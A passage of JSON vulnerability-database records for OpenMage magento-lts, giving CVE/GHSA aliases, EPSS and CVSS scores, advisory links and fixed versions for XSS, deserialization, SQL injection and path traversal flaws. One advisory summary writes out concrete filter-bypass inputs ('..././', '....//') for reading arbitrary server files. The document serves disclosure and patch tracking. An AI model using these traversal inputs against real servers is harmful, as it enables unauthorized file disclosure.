"0.00088", "scoring_system": "epss", "scoring_elements": "0.25198", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25265", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25169", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15151" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/7c526bc6a6a51b57a1bab4c60f104dc36cde347a", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/7c526bc6a6a51b57a1bab4c60f104dc36cde347a" }, { "reference_url": "https://helpx.adobe.com/security/products/magento/apsb20-47.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://helpx.adobe.com/security/products/magento/apsb20-47.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15151", "reference_id": "CVE-2020-15151", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15151" }, { "reference_url": "https://github.com/advisories/GHSA-crf2-xm6x-46p6", "reference_id": "GHSA-crf2-xm6x-46p6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-crf2-xm6x-46p6" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-crf2-xm6x-46p6", "reference_id": "GHSA-crf2-xm6x-46p6", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-crf2-xm6x-46p6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/77883?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-nv23-eun4-1fdd" }, { "vulnerability": "VCID-pvcg-c61e-x3an" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" }, { "vulnerability": "VCID-zwm8-96yp-nben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.2" } ], "aliases": [ "CVE-2020-15151", "GHSA-crf2-xm6x-46p6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-87ka-etbj-pfen" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56736?format=api", "vulnerability_id": "VCID-9axm-6vqd-tkag", "summary": "Magento LTS vulnerable to stored XSS in theme config fields\nAs reported by [Aakash Adhikari](https://hackerone.com/dark_haxor), Github: @justlife4x4, the Design > Themes > Skin (Images / CSS) config field allows a Stored XSS when it contains an end script tag.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-27400", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41763", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41797", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41827", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00198", "scoring_system": "epss", "scoring_elements": "0.41817", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-27400" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/d307e5bf75729a2347dde0952fe9fd9fcd9c6aea", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/d307e5bf75729a2347dde0952fe9fd9fcd9c6aea" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.12.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.12.3" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.13.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.13.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27400", "reference_id": "CVE-2025-27400", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27400" }, { "reference_url": "https://github.com/advisories/GHSA-5pxh-89cx-4668", "reference_id": "GHSA-5pxh-89cx-4668", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-5pxh-89cx-4668" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5pxh-89cx-4668", "reference_id": "GHSA-5pxh-89cx-4668", "reference_type": "", "scores": [ { "value": "2.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-28T15:41:48Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5pxh-89cx-4668" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/84212?format=api", "purl": "pkg:composer/openmage/magento-lts@20.12.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.12.3" } ], "aliases": [ "CVE-2025-27400", "GHSA-5pxh-89cx-4668" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9axm-6vqd-tkag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54392?format=api", "vulnerability_id": "VCID-9tvj-q7kh-7faz", "summary": "Deserialization of Untrusted Data\nMagento-lts is a long-term support alternative to Magento Community Edition (CE). In magento-lts versions 19.4.12 and prior and 20.0.8 and prior, there is a vulnerability caused by the unsecured deserialization of an object. A patch in versions 19.4.13 and 20.0.9 was back ported from Zend Framework 3. The vulnerability was assigned CVE-2021-3007 in Zend Framework.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21426", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61369", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61344", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61392", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.614", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00405", "scoring_system": "epss", "scoring_elements": "0.61387", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21426" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21426", "reference_id": "CVE-2021-21426", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21426" }, { "reference_url": "https://github.com/advisories/GHSA-m496-x567-f98c", "reference_id": "GHSA-m496-x567-f98c", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m496-x567-f98c" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c", "reference_id": "GHSA-m496-x567-f98c", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-m496-x567-f98c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/80407?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/302495?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.10" } ], "aliases": [ "CVE-2021-21426", "GHSA-m496-x567-f98c" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9tvj-q7kh-7faz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55589?format=api", "vulnerability_id": "VCID-9ztp-ffqs-4yh4", "summary": "Magento LTS vulnerable to stored Cross-site Scripting (XSS) in admin system configs\nThis XSS vulnerability is about the system configs\n* design/header/welcome\n* design/header/logo_src\n* design/header/logo_src_small\n* design/header/logo_alt\n\nThey are intended to enable admins to set a text in the two cases, and to define an image url for the other two cases.\nBut because of previously missing escaping allowed to input arbitrary html and as a consequence also arbitrary JavaScript.\n\nWhile this is in most usage scenarios not a relevant issue, some people work with more restrictive roles in the backend. Here the ability to inject JavaScript with these settings would be an unintended and unwanted privilege.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-41676", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71703", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71717", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.7174", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00669", "scoring_system": "epss", "scoring_elements": "0.71734", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-41676" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/484cf8afc550e98bbf2c03fbb29a8450a32e7948", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T15:41:02Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/484cf8afc550e98bbf2c03fbb29a8450a32e7948" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41676", "reference_id": "CVE-2024-41676", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41676" }, { "reference_url": "https://github.com/advisories/GHSA-5vrp-638w-p8m2", "reference_id": "GHSA-5vrp-638w-p8m2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5vrp-638w-p8m2" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vrp-638w-p8m2", "reference_id": "GHSA-5vrp-638w-p8m2", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-29T15:41:02Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5vrp-638w-p8m2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/82278?format=api", "purl": "pkg:composer/openmage/magento-lts@20.10.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.10.1" } ], "aliases": [ "CVE-2024-41676", "GHSA-5vrp-638w-p8m2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ztp-ffqs-4yh4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53974?format=api", "vulnerability_id": "VCID-b33e-r7rr-pyf7", "summary": "Path Traversal\nOpenMage is a community-driven alternative to Magento CE. In OpenMage there is a vulnerability which enables remote code execution. In affected versions an administrator with permission to update product data to be able to store an executable file on the server and load it via layout xml.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26252", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82422", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.8245", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82449", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82447", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01664", "scoring_system": "epss", "scoring_elements": "0.82441", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26252" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26252", "reference_id": "CVE-2020-26252", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26252" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79587?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.6" } ], "aliases": [ "CVE-2020-26252", "GHSA-99m6-r53j-4hh2" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b33e-r7rr-pyf7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/54389?format=api", "vulnerability_id": "VCID-b7ua-zfks-fyg5", "summary": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\nMagento-lts is a long-term support alternative to Magento Community Edition (CE). A vulnerability in magento-lts versions before 19.4.13 and 20.0.9 potentially allows an administrator unauthorized access to restricted resources. This is a backport of CVE-2021-21024. The vulnerability is patched in versions 19.4.13 and 20.0.9.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21427", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70821", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70803", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70845", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70852", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00636", "scoring_system": "epss", "scoring_elements": "0.70835", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-21427" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21427", "reference_id": "CVE-2021-21427", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21427" }, { "reference_url": "https://github.com/advisories/GHSA-fvrf-9428-527m", "reference_id": "GHSA-fvrf-9428-527m", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fvrf-9428-527m" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m", "reference_id": "GHSA-fvrf-9428-527m", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/80407?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/302495?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.10" } ], "aliases": [ "CVE-2021-21427", "GHSA-fvrf-9428-527m" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b7ua-zfks-fyg5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89610?format=api", "vulnerability_id": "VCID-cbms-5g8f-wyg6", "summary": "OpenMage LTS has a Path Traversal Filter Bypass in Dataflow Module\nThe Dataflow module in OpenMage LTS uses a weak blacklist filter (`str_replace('../', '', $input)`) to prevent path traversal attacks. This filter can be bypassed using patterns like `..././` or `....//`, which after the replacement still result in `../`. An authenticated administrator can exploit this to read arbitrary files from the server filesystem.\n\n\n| Metric | Value | Justification |\n| ------------------------ | --------- | ------------------------------------- |\n| Attack Vector (AV) | Network | Exploitable via admin panel |\n| Attack Complexity (AC) | Low | Simple bypass pattern |\n| Privileges Required (PR) | High | Requires admin authentication |\n| User Interaction (UI) | None | No additional user interaction needed |\n| Scope (S) | Unchanged | Impacts the vulnerable component |\n| Confidentiality (C) | High | Can read sensitive system files |\n| Integrity (I) | None | Read-only vulnerability 